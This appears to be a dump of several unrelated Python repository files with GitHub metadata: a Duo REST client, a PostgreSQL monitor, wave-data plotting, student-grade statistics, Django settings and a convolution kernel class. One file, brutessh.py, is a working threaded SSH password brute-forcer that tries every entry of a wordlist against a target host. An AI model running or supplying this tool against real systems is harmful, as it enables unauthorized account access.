migrations.AlterField(
model_name='station',
name='dmaid',
field=models.ManyToManyField(to='dmam.DMABaseinfo'),
),
]
| [
"apengok@163.com"
] | apengok@163.com |
a2186908aa7b8027e46fe08ced94527e26625466 | 2a66595b5067619cf79e4e70bd47662ad01346ea | /bin/duo_client/rest.py | 6dfb577034220f5fc6f46d67fbd849ddbced6240 | [
"Apache-2.0"
] | permissive | f8al/TA_DuoSecurity | 42205ed10eecaa2b20db85d6febc508e9b21b3ba | 80de59a0f72876a06d41499a9235c6caf4cd9ea0 | refs/heads/master | 2021-01-02T09:44:01.903364 | 2015-04-28T19:53:07 | 2015-04-28T19:53:07 | 34,752,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,200 | py | """
Duo Security REST API reference client implementation.
<http://www.duosecurity.com/docs/duorest>
"""
import client
SIG_VERSION = 1
FACTOR_AUTO = "auto"
FACTOR_PASSCODE = "passcode"
FACTOR_PHONE = "phone"
FACTOR_SMS = "sms"
FACTOR_PUSH = "push"
PHONE1 = "phone1"
PHONE2 = "phone2"
PHONE3 = "phone3"
PHONE4 = "phone4"
PHONE5 = "phone5"
def ping(ikey, skey, host, ca=None):
"""
Returns True if and only if the Duo service is up and responding.
"""
path = "/rest/v1/ping"
response = client.call_json_api(ikey, skey, host, 'GET', path, ca,
sig_version=SIG_VERSION)
return response == 'pong'
def check(ikey, skey, host, ca=None):
"""
Returns True if and only if the integration key, secret key, and
signature generation are valid.
"""
path = "/rest/v1/check"
response = client.call_json_api(ikey, skey, host, 'GET', path, ca,
sig_version=SIG_VERSION)
return response == 'valid'
def preauth(ikey, skey, host, username, ca=None):
path = "/rest/v1/preauth"
response = client.call_json_api(ikey, skey, host, "POST", path, ca,
sig_version=SIG_VERSION, user=username)
return response
def auth(ikey, skey, host, username, factor=FACTOR_PHONE,
auto=None, passcode=None, phone=PHONE1, pushinfo=None,
async=False, ca=None):
"""
Returns True if authentication was a success, else False.
If 'async' is True, returns txid of the authentication transaction.
"""
path = "/rest/v1/auth"
kwargs = {}
if async:
kwargs['async'] = '1'
if factor == FACTOR_AUTO:
kwargs['auto'] = auto
elif factor == FACTOR_PASSCODE:
kwargs['code'] = passcode
elif factor == FACTOR_PHONE:
kwargs['phone'] = phone
elif factor == FACTOR_SMS:
kwargs['phone'] = phone
elif factor == FACTOR_PUSH:
kwargs['phone'] = phone
response = client.call_json_api(ikey, skey, host, "POST", path, ca,
sig_version=SIG_VERSION,
user=username,
factor=factor,
**kwargs)
if async:
return response['txid']
return response['result'] == 'allow'
def status(ikey, skey, host, txid, ca=None):
"""
Returns a 3-tuple:
(complete, success, description)
complete - True if the authentication request has
completed, else False.
success - True if the authentication request has
completed and was a success, else False.
description - A string describing the current status of the
authentication request.
"""
path = "/rest/v1/status"
response = client.call_json_api(ikey, skey, host, "GET", path, ca,
sig_version=SIG_VERSION, txid=txid)
complete = False
success = False
if "result" in response:
complete = True
success = response['result'] == 'allow'
description = response['status']
return (complete, success, description)
| [
"f8al.err0r@gmail.com"
] | f8al.err0r@gmail.com |
5c5465c253daa04586e6d3556f0b179cf0fb2129 | afb227fea096c4a904b0da4d013c66245cf78030 | /brutessh.py | 4616cd6054609b851b1cf389c95cbadcacdfd8c6 | [] | no_license | mmssr/brutessh_py | 691ce658ca79b6c22b0c69af8b62311fc9c5e5ad | d513a4b34fa4056bae586ddaffb23fdbf94d8a3b | refs/heads/master | 2020-06-21T14:42:47.922657 | 2019-09-12T14:34:54 | 2019-09-12T14:34:54 | 197,483,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,956 | py | #!/usr/bin/python
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print("[+] Password Found: " + password)
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog ' + '-H <target host> -u <user> -F <password list>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-u', dest='user', type='string', help='specify the user')
parser.add_option('-F', dest='passwdfile', type='string', help='specify password file')
(options, args) = parser.parse_args()
host = options.tgtHost
user = options.user
passwdfile = options.passwdFile
if host == None or user == None or passwdfile == None:
print parser.usage
exit(0)
fn = open(passwdfile, 'r')
for line in fn.readlines():
if Found:
print("[*] Exiting: Password Found")
exit(0)
if Fails > 5:
print("[!] Exiting: Too Many Socket Timeouts")
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print("[-] Testing: " + str(password))
t = Thread(target=connect, args=(host, user, password, True))
child = t.start()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
dac766b0f1ec3ef07bb46db14747a4554d28c271 | 1410b5c2a1d549115b16af0e8ef1efac557eaa3f | /实验二/实验代码与数据/exp2.py | 61ca5fc7c6f6c140d6866185a14666d3c30b073e | [] | no_license | NGUYEN-EDawn/Machine_Learning--experiment | cf8402014119267c9fe96164df0eb996a1092763 | 3d0e0e0f437e1f99d0b77195e9303e91d78f27cb | refs/heads/main | 2023-02-14T02:21:20.885630 | 2021-01-06T12:38:21 | 2021-01-06T12:38:21 | 327,285,634 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 9,087 | py | import pandas
import numpy
import matplotlib.pyplot
import seaborn
import copy
import exp1 #导入实验一的模块,方便后续读取
'''设置value的现实长度,并显示所有行和列'''
def show_value():
pandas.set_option('display.max_columns', None)
pandas.set_option('display.max_rows', None)
pandas.set_option('display.max_columns', 10000)
pandas.set_option('display.width', 10000)
pandas.set_option('display.max_colwidth', 10000)
'''第一题:请以课程1成绩为x轴,体能成绩为y轴,画出散点图'''
def exp2_num_one(cla):
# 定义一个体育成绩评价对应到具体成绩的字典
test_table = {'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
'''首先单独将类中的成绩1和体育成绩读取出来存入一个类中'''
score1_list = []
pt_list = []
for i in range(len(cla.student)):
if (cla.student[i].score[0] == 'None') or (cla.student[i].physical_test == ''):
# 如果学生的成绩一或者体育成绩为空,则跳过该生
pass
else:
score1_list.append(cla.student[i].score[0])
pt_list.append(test_table[cla.student[i].physical_test])
matplotlib.pyplot.scatter(score1_list, pt_list, c='green', marker='*')
matplotlib.pyplot.title("scatter diagram")
matplotlib.pyplot.xlabel('score1')
matplotlib.pyplot.ylabel('physical_test')
matplotlib.pyplot.savefig('散点图.png', bbox_inches='tight')
matplotlib.pyplot.show()
return score1_list # 存储成绩1的列表第二题还要用,将其返回
'''第二题:2. 以5分为间隔,画出课程1的成绩直方图'''
def exp2_num_two(cla, score1_list):
# 定义一个列表存储间隔
space = [65, 70, 75, 80, 85, 90]
matplotlib.pyplot.hist(score1_list, edgecolor='blue')
matplotlib.pyplot.title('cube map')
matplotlib.pyplot.grid(True, linestyle='--', alpha=0.5, axis='y')
matplotlib.pyplot.savefig('直方图.png', dpi=300, bbox_inches='tight')
matplotlib.pyplot.show()
'''第三题:对每门成绩进行z-score归一化,得到归一化的数据矩阵'''
def exp2_num_three(cla):
# 定义体育成绩所对应具体成绩的字典
test_table = {'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
n = len(cla.student)
sum_pt_score = 0 # 体育成绩百分制总和
square_sum_pt = 0 # 体育成绩百分制平方和
sum_square_pt = 0 # 体育成绩百分制和的平方
std_pt = 0 # 体育成绩百分制的标准差
sum_score = [0, 0, 0, 0, 0, 0, 0, 0, 0] # 各科成绩的总和
square_sum_score = [0, 0, 0, 0, 0, 0, 0, 0, 0] # 各科成绩的平方和
sum_square_score = [0, 0, 0, 0, 0, 0, 0, 0, 0] # 各科成绩的和平方
average_score = [0, 0, 0, 0, 0, 0, 0, 0, 0] # 各科成绩的平均值
std_score = [0, 0, 0, 0, 0, 0, 0, 0, 0] # 各科成绩的标准差
for i in range(n):
try:
sum_pt_score += test_table[cla.student[i].physical_test]
square_sum_pt += pow(test_table[cla.student[i].physical_test], 2)
except:
pass
for j in range(0, 9):
if cla.student[i].score[j] == 'None':
pass
else:
sum_score[j] += cla.student[i].score[j]
square_sum_score[j] += pow(cla.student[i].score[j], 2)
for i in range(0, 9):
sum_square_score[i] = pow(sum_score[i], 2) # 求出各科成绩的和平方
average_score[i] = sum_score[i] / n # 求出各科成绩的平均值
sum_square_pt = pow(sum_pt_score, 2) # 求出体育成绩的和平方
average_pt = sum_pt_score / n # 求出体育成绩的平均值
std_pt = pow(((square_sum_pt - sum_square_pt / n) / (n - 1)), 0.5) # 求出体育成绩的标准差
for i in range(0, 9):
std_score[i] = pow(((square_sum_score[i] - sum_square_score[i] / n) / (n - 1)), 0.5) # 求出各科成绩的标准差
# 求出各个同学体育成绩的z_score
z_pt_score = []
for i in range(n):
try:
z_pt_score.append((test_table[cla.student[i].physical_test] - average_pt) / std_pt)
# 如果无法计算则说明成绩为None,所以进行异常处理
except:
z_pt_score.append(0)
z_score = [[] for i in range(n)]
for i in range(0, 9):
for j in range(n):
try:
z_score[j].append((cla.student[j].score[i] - average_score[i]) / std_score[i])
except:
z_score[j].append(0)
for i in range(n):
z_score[i].append(z_pt_score[i])
matrix = numpy.mat(z_score)
m_f = pandas.DataFrame(data=matrix)
m_f.to_csv('z-score.txt', sep='\t', header=False, index=False)
'''第四题:计算出100x100的相关矩阵,并可视化出混淆矩阵'''
def exp2_num_four(cla):
# 定义体育成绩所对应具体成绩的字典
test_table = {'': 0, 'bad': 60, 'general': 70, 'good': 80, 'excellent': 90}
# 将每个学生的所有成绩都转化成百分制
for i in range(len(cla.student)):
for z in range(0, 9):
if cla.student[i].score[z] == 'None':
cla.student[i].score[z] = 0
for j in range(5, 9):
cla.student[i].score[j] *= 10
cla.student[i].physical_test = test_table[cla.student[i].physical_test]
# 求每个学生成绩的平均值
average_list = []
for i in range(len(cla.student)):
temp = 0
un_null = 10
for j in range(0, 9):
if cla.student[i].score[j] == 0:
un_null -= 1
else:
temp += cla.student[i].score[j]
if cla.student[i].physical_test == 0:
un_null -= 1
else:
temp += cla.student[i].physical_test
average_list.append(temp / un_null)
cor_mat = numpy.mat(numpy.zeros((len(cla.student), len(cla.student))))
# 求每个学生成绩的标准差
list_std = []
for i in range(len(cla.student)):
temp = 0
un_null = 10
for j in range(0, 9):
if cla.student[i].score[j] == 0:
un_null -= 1
else:
temp += ((cla.student[i].score[j] - average_list[i]) ** 2)
if cla.student[i].physical_test == 0:
un_null -= 0
else:
temp += ((cla.student[i].physical_test - average_list[i]) ** 2)
list_std.append(numpy.sqrt(temp / (un_null - 1)))
# 计算两个学生的协方差并将结果返回
def cor(i, j):
temp = 0
un_null = 10
for s in range(0, 9):
if cla.student[i].score[s] == 0 or cla.student[j].score[s] == 0:
un_null -= 1
else:
x = cla.student[i].score[s] - average_list[i]
y = cla.student[j].score[s] - average_list[j]
temp += (x*y)
temp += (cla.student[i].physical_test - average_list[i]) * (cla.student[j].physical_test - average_list[j])
return temp / (un_null - 1)
for i in range(len(cla.student)):
for j in range(len(cla.student)):
t = cor(i, j)
cor_mat[i, j] = t / (list_std[i] * list_std[j])
matplotlib.pyplot.figure(figsize=(20, 20), dpi=80)
seaborn.heatmap(cor_mat, vmin=-1, vmax=1, linewidths=0.08, xticklabels=False, cmap='coolwarm') # 用热点图可视化相关矩阵
matplotlib.pyplot.savefig('热点图.png', dpi=100, bbox_inches='tight')
matplotlib.pyplot.show()
return cor_mat #将矩阵返回用于第五题
'''第五题:根据相关矩阵,找到距离每个样本最近的三个样本,得到100x3的矩阵'''
def exp2_num_five(cla, cor_mat):
# 将传入的矩阵复制
cor_mat_c = copy.deepcopy(cor_mat)
maxlist = []
id = []
for i in range(len(cor_mat_c)):
p = []
l = []
b = numpy.argsort(cor_mat_c[i], axis=1)
p.append(cor_mat_c[i, b[0, len(cor_mat_c) - 2]])
p.append(cor_mat_c[i, b[0, len(cor_mat_c) - 3]])
p.append(cor_mat_c[i, b[0, len(cor_mat_c) - 4]])
maxlist.append(p)
l.append(cla.student[b[0, len(cor_mat_c) - 2]].id)
l.append(cla.student[b[0, len(cor_mat_c) - 3]].id)
l.append(cla.student[b[0, len(cor_mat_c) - 4]].id)
id.append(l)
id_mat = numpy.mat(id)
dfid = pandas.DataFrame(data=id_mat)
print(dfid)
dfid.to_csv('矩阵输出.txt', sep='\t', index=False, header=False)
cla = exp1.Class()
cla, txt_len = exp1.Load_txt(cla, '一.数据源2-逗号间隔.txt')
cla, xls_len = exp1.Load_excel(cla, '一.数据源1.xls', txt_len)
exp1.data_unit(cla, txt_len, xls_len)
# score1_list = exp2_num_one(cla)
# exp2_num_two(cla, score1_list)
std_list = exp2_num_three(cla)
cor_mat = exp2_num_four(cla)
exp2_num_five(cla, cor_mat) | [
"noreply@github.com"
] | noreply@github.com |
07669c7e29c84fc8f5e8d47d25b8e77dceeea761 | 0a17d91a08eeb32be713271a6d954bd24dc3d70d | /local_monitor/check_pgsql.py | f9589ffac1591e6cb4517ffac7eb68b3b8aa608c | [] | no_license | Som-Energia/somenergia-systemmonitor | 2edcea3524c5379c5cc5a9fcf2ac2e804f01f94c | 51ab7c54a8a7906d42b6a343754fadf43ecda579 | refs/heads/master | 2021-01-22T03:04:59.600542 | 2015-09-18T14:03:00 | 2015-09-18T14:03:00 | 39,762,000 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,664 | py | from pgactivity.Data import Data
import sys, re
import getopt
config = {
'host': '',
'database': '',
'logdb': '',
'logfile': '',
'mem_percent_max': 5,
'cpu_percent_max': 1
}
def dump(proc_id, cpu_percent, mem_percent, query_start, query, prev_queries):
print '################## PostgreSQL query #######################'
print 'Query: {query}'.format(**locals())
print 'ID: {} CPU: {} MEM: {} START: {}'.format(proc_id, cpu_percent, mem_percent, query_start)
for query in prev_queries:
if len(query) > 0:
print 'START: {} {} QUERY: {}'.format(query[0], query[1], query[3])
def main(config, skip_idle):
db = Data()
db.pg_connect(
host = config['host'],
database = config['database']
)
pg_version = db.pg_get_version()
waiting_queries = db.pg_get_waiting()
blocking_queries = db.pg_get_blocking()
active_queries = db.pg_get_activities()
active_procs = db.sys_get_proc(active_queries, True)
n_active_procs = len(active_procs)
for proc_id in active_procs:
proc = active_procs[proc_id]
query = active_procs[proc_id].query
query_start = active_procs[proc_id].query_start
mem_percent = proc.extras['mem_percent']
cpu_percent = proc.extras['cpu_percent']
if proc.query.startswith('<IDLE>') and skip_idle:
n_active_procs -= 1
continue
if cpu_percent >= config['cpu_percent_max'] or mem_percent >= config['mem_percent_max'] or not skip_idle:
with open(config['logfile'], 'r') as log:
prev_queries = []
for line in log:
regex_syntax = "(\d{4}-\d{2}-\d{2}) (\d{2}:\d{2}:\d{2}) CEST %s \((%s)/\d+\) LOG: (.*)" % (config['logdb'],proc_id)
regex = re.compile(regex_syntax)
match = regex.match(line)
if match:
prev_queries.append(match.groups())
dump(proc_id, cpu_percent, mem_percent, query_start, query, prev_queries)
print 'Active procs: {}'.format(n_active_procs)
status = False
if n_active_procs == 0:
status = True
print 'Status (test): {}'.format(status)
if __name__ == '__main__':
argv = sys.argv[1:]
skip_idle = False
try:
opts, args = getopt.getopt(argv,"h",["skip-idle"])
except getopt.GetoptError:
print 'monitor.py <--skip-idle>'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'monitor.py <--skip-idle>'
elif opt == '--skip-idle':
skip_idle = True
main(config, skip_idle)
| [
"aleix.badia@somenergia.coop"
] | aleix.badia@somenergia.coop |
5ad8dd35cbbf54dd08cb65dc8a9795f629ba0491 | 077bc78b9daa8451537eb4af7288ec3536cf36d3 | /api/api/settings.py | 8bd9f8f730b7f41a3b3d1441afa57c62d5d71b6b | [] | no_license | prnvshrn/PythonPractice | fb0e8ec8034d4809682516a54ddc275b91f10b4f | 5ad7d4d97d0bb9ae559d3d86ae3271bf87b9314b | refs/heads/master | 2020-04-17T05:47:15.701006 | 2019-02-24T08:03:09 | 2019-02-24T08:03:09 | 166,296,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,111 | py | """
Django settings for api project.
Generated by 'django-admin startproject' using Django 2.0.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't=f^k*z$)8_9(m%c$wgn3d^@1tm%4it%@!bbp)-$b7mf5$d-(b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'music'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
| [
"prnvshrn@gmail.com"
] | prnvshrn@gmail.com |
4b0005ae4464e908e24fe17be4603c3c86f323c1 | 8624423690e559285714fb3de0ca0c7a3dc61644 | /wis_aggregate.py | 5e5729796e44cce97e7619266deac4261122db0e | [] | no_license | randobucci/wis-cdip-compare | d460e3e1d94bba5b39136a0ed92f55c96a73ba00 | 734e82ec5b468e5f09ea9b3df4045bfa5d5d8bd5 | refs/heads/master | 2020-05-30T05:14:22.418181 | 2019-05-31T08:25:36 | 2019-05-31T08:28:29 | 189,555,310 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,011 | py | '''
* wis_aggregate.py
* WIS data are organized by month, this code will aggregate
* Aggregate individual WIS netcdf files for entire year and plot
* https://chlthredds.erdc.dren.mil/thredds/catalog/wis/Atlantic/ST44098/2008/catalog.html
exec(open("wis_aggregate.py").read())
'''
#- Import libraries
import netCDF4
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mat_dates
from datetime import datetime
from dateutil.rrule import rrule, MONTHLY
import dateutil.parser
import time
import calendar
#- NDBC Station
ndbc_id = '44098' #- 160- jeffrey's Ledge
cdip_id = '163'
buoy_name = 'Jeffreys Ledge'
region = 'Atlantic'
start_date = '20080101'
end_date = '20081231'
end_date = '20080430'
#- Define a function to convert date_string (YYYYMMDD) to datetime obj
def str_datetime(d):
return (datetime.strptime(d,'%Y%m%d'))
#- convert to datetime objects
start_dt = str_datetime(start_date)
end_dt = str_datetime(end_date)
#- get a list of months between start and end time
dates = [dt for dt in rrule(MONTHLY, dtstart=start_dt,until=end_dt)]
#- Read in data from muli-file netCDF dataset.
#- Reference: https://unidata.github.io/netcdf4-python/netCDF4/index.html#section8
fnames = []
for dt in dates:
year = dt.strftime('%Y') #- '2008'
month = dt.strftime('%m') #- '02'
wis_url = 'https://chlthredds.erdc.dren.mil/thredds/dodsC/wis/'+ \
region+'/ST'+ndbc_id+'/'+year+'/'
nc_file = 'WIS-ocean_waves_ST'+ndbc_id+'_'+year+month+'.nc'
fnames.append(wis_url+nc_file)
#- Try using xarray library to merge mulitple netCDF files
DS = xr.open_mfdataset(fnames)
#- Use xarray.values to get values as numpy object
nc_time = DS.time.values
#- Function to convert numpy64 to datetime
#- https://gist.github.com/blaylockbk/1677b446bc741ee2db3e943ab7e4cabd
def to_datetime(date):
"""
Converts a numpy datetime64 object to a python datetime object
Input:
date - a np.datetime64 object
Output:
DATE - a python datetime object
"""
timestamp = ((date - np.datetime64('1970-01-01T00:00:00'))
/ np.timedelta64(1, 's'))
return datetime.utcfromtimestamp(timestamp)
wave_time = [to_datetime(t) for t in nc_time]
Hs = DS.waveHs.values
Tp = DS.waveTp.values
Dp = DS.waveMeanDirection.values
# Function to find nearest value in numpy array
def find_nearest(array,value):
idx = (np.abs(array-value)).argmin()
return array[idx]
# Function to convert from human-format to UNIX timestamp
def get_timestamp(humanTime,dateFormat):
unixTimestamp = int(time.mktime(datetime.strptime(humanTime, dateFormat).timetuple()))
return unixTimestamp
'''
#- Get time indices: That is find the UNIX timestamp values that correspond to Start and End dates entered above
#- Note: this isn't important if small time-series, gets more important for large datasets
unix_start = get_timestamp(start_date,"%Y%m%d")
nearest_start = find_nearest(nc_time, unix_start) # Find the closest unix timestamp
start_index = np.where(nc_time==nearest_start)[0][0] # Grab the index number of found date
unix_end = get_timestamp(end_date,"%Y%m%d")
future = find_nearest(nc_time, unix_end) # Find the closest unix timestamp
end_index = np.where(nc_time==future)[0][0] # Grab the index number of found date
'''
#- Plot wave bulk parameters
# Create figure and specify subplot orientation (3 rows, 1 column), shared x-axis, and figure size
f, (pHs, pTp, pDp) = plt.subplots(3, 1, sharex=True, figsize=(15,10))
# Create 3 stacked subplots for three PARAMETERS (Hs, Tp, Dp)
pHs.plot(wave_time,Hs,'b')
pTp.plot(wave_time,Tp,'b')
pDp.scatter(wave_time,Dp,color='blue',s=5) # Plot Dp variable as a scatterplot, rather than line
#- plot title
plot_title = nc.title+': STN '+ndbc_id+' ('+cdip_id+')'
# Set Titles
plt.suptitle(plot_title, fontsize=30, y=0.99)
plt.title(start_date + " - " + end_date, fontsize=20, y=3.45)
# Set tick parameters
pHs.set_xticklabels(['1','6','11','16','21','26','31'])
pHs.tick_params(axis='y', which='major', labelsize=12, right='off')
pHs.tick_params(axis='x', which='major', labelsize=12, top='off')
# Set x-axis tick interval to every 5 days
months = mat_dates.MonthLocator(interval=1)
daysFmt = mat_dates.DateFormatter('%m/%d')
plt.gca().xaxis.set_major_locator(months)
plt.gca().xaxis.set_major_formatter(daysFmt)
# Label x-axis
plt.xlabel('Month', fontsize=18)
# Make a second y-axis for the Hs plot, to show values in both meters and feet
pHs2 = pHs.twinx()
# Set y-axis limits for each plot
pHs.set_ylim(0,8)
pHs2.set_ylim(0,25)
pTp.set_ylim(0,28)
pDp.set_ylim(0,360)
# Label each y-axis
pHs.set_ylabel('Hs(m)', fontsize=18)
pHs2.set_ylabel('Hs(ft)', fontsize=18)
pTp.set_ylabel('Tp(s)', fontsize=18)
pDp.set_ylabel('Dmean(deg)', fontsize=18)
# Plot dashed gridlines
pHs.grid(b=True, which='major', color='b', linestyle='--')
pTp.grid(b=True, which='major', color='b', linestyle='--')
pDp.grid(b=True, which='major', color='b', linestyle='--')
plt.show()
| [
"randy@cdip.ucsd.edu"
] | randy@cdip.ucsd.edu |
ccf80a462e22e35169a4f53dd0765364f0bf06a1 | 2313b8b300e9b4d93c389b99a88ddde62777cbec | /manage.py | 075a44e92a62accef1629bc40ba5b8236461719e | [] | no_license | sandeep9889/Ecom-website-my-dark_cart- | dabe0fa755987325ab022e8260ed9466486715cb | 77ac1f9c0df2df3a8176d28aaeb7e7cc865166ef | refs/heads/main | 2023-08-15T00:14:54.365697 | 2021-09-26T06:58:32 | 2021-09-26T06:58:32 | 407,761,521 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 659 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mdc.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"sandeepchauhan9630228313@gmail.com"
] | sandeepchauhan9630228313@gmail.com |
44c0c2a25289a830352fffb362482c33d19f8786 | 9eb2f8869841ac3cead8a2d078251acaf60e63f5 | /gym-sampler/gym_sampler/__init__.py | d824f26e2d0a4221989134dfe5234164bd727f0c | [] | no_license | sugadev/CS744-Approximate-Graph-Analytics | 70ef928f7d46f1c60dfb5119d0e4582b0eeec7b8 | 5546459b2025e78981352c065955efc73e2fa5fd | refs/heads/master | 2020-05-05T09:43:32.619115 | 2019-05-11T06:34:16 | 2019-05-11T06:34:16 | 179,914,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | from gym.envs.registration import register
register(
id='sampler-v0',
entry_point='gym_sampler.envs:SamplerEnv',
)
| [
"daravinds@gmail.com"
] | daravinds@gmail.com |
48340745ab9a0236bbd3bac3aaebc3bdea5cf6b8 | 7dad7678182d8d7c6ae154b5a1fb9acf9591569f | /params.py | bc52be08af46fbcecbde5422a078f15eed545394 | [] | no_license | aalbahem/CQA_Diversification | e9496885438aac489feb39d49a1f82a43358dbad | 979837799850c53e392e3f2a08df7f06d9174009 | refs/heads/master | 2021-10-11T07:43:46.849876 | 2019-01-23T10:38:27 | 2019-01-23T10:38:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | num_iters = 1501
batch_size = 5 #10000
corrupt_size = 3
slice_size = 5
wv_size = 100
regularization = 0.0001
save_per_iter = 50
learning_rate = 0.001
max_sentence_length = 100
lstm_size = 50
output_path = 'output/'
| [
"shahar76@gmail.com"
] | shahar76@gmail.com |
0949b4ee43b9c08b0b51e8c536a1100b9876b8d6 | 3b21c2a5422dc2b900f65894849e7e2e765fc7cc | /Kernel.py | 826a4f1526122ef14a5e4576a9be89b475d4390a | [] | no_license | mrbhjv/dft_python | 2c519dcdb5100511376c35db63c0248628fb9b3e | 480fffd81374f37f6a62c362fb551b2021772429 | refs/heads/master | 2020-04-24T09:04:28.412581 | 2011-07-21T12:23:47 | 2011-07-21T12:23:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,527 | py | import math
import random
from scipy import ndimage
import numpy
import copy
def convolve(input, kernel):
convolution_result = copy.copy(input)
for dimension_index in range(kernel.get_dimensionality()):
ndimage.convolve1d(convolution_result, \
kernel.get_separated_kernel_part(dimension_index), \
axis = dimension_index, \
output = convolution_result, \
mode = 'wrap')
return convolution_result
class Kernel:
"n-dimensional kernel"
def __init__(self, amplitude):
self._dimensionality = None
self._amplitude = amplitude
def get_amplitude(self):
return self._amplitude
def get_separated_kernel_part(self, dimension_index):
self._check_dimension_index(dimension_index)
return self._separated_kernel_parts[dimension_index]
def get_separated_kernel_parts(self):
return self._separated_kernel_parts
def get_dimension_size(self, dimension_index):
return self._dimension_sizes[dimension_index]
def get_dimension_sizes(self):
return self._dimension_sizes
def get_dimensionality(self):
return self._dimensionality
def set_amplitude(self, amplitude):
self._amplitude = amplitude
self._calculate_kernel()
def _check_dimension_index(self, dimension_index):
if not (dimension_index >= 0 and dimension_index < self._dimensionality):
print("Error. Kernel only has", self._dimensionality, "dimensions.")
def _calculate_kernel(self):
pass
class GaussKernel(Kernel):
"n-dimensional Gauss kernel"
def __init__(self, amplitude, widths, shifts=None):
Kernel.__init__(self, amplitude)
self._widths = widths
self._shifts = None
self._dimensionality = len(self._widths)
self._dimension_sizes = None
self._limit = 0.1
self._separated_kernel_parts = None
if (shifts is None):
self._shifts = [0.0] * self._dimensionality
else:
if (len(self._widths) != len(self._shifts)):
print("Error. Number of shift and width values does not match.")
self._calculate_separated_kernel_parts()
def get_width(self, dimension_index):
self._check_dimension_index(dimension_index)
return self._widths[dimension_index]
def get_widths(self):
return self._widths
def get_shift(self, dimension_index):
self._check_dimension_index(dimension_index)
return self._shifts[dimension_index]
def get_shifts(self):
return self._shifts
def set_width(self, width, dimension_index):
self._check_dimension_index(dimension_index)
self._widths[dimension_index] = width
self._calculate_separated_kernel_parts()
def set_shift(self, shift, dimension_index):
self._check_dimension_index(dimension_index)
self._shifts = shifts
self._calculate_separated_kernel_parts()
def _calculate_dimension_size(self, dimension_index):
if not (dimension_index >= 0 and dimension_index < self._dimensionality):
print("Error. Kernel only supports ", self._dimensionality, " dimensions.")
dimension_width = self._widths[dimension_index]
if (dimension_width < 10000 and dimension_width > 0):
dimension_size = int(round(math.sqrt(2.0 * math.pow(dimension_width, 2.0) \
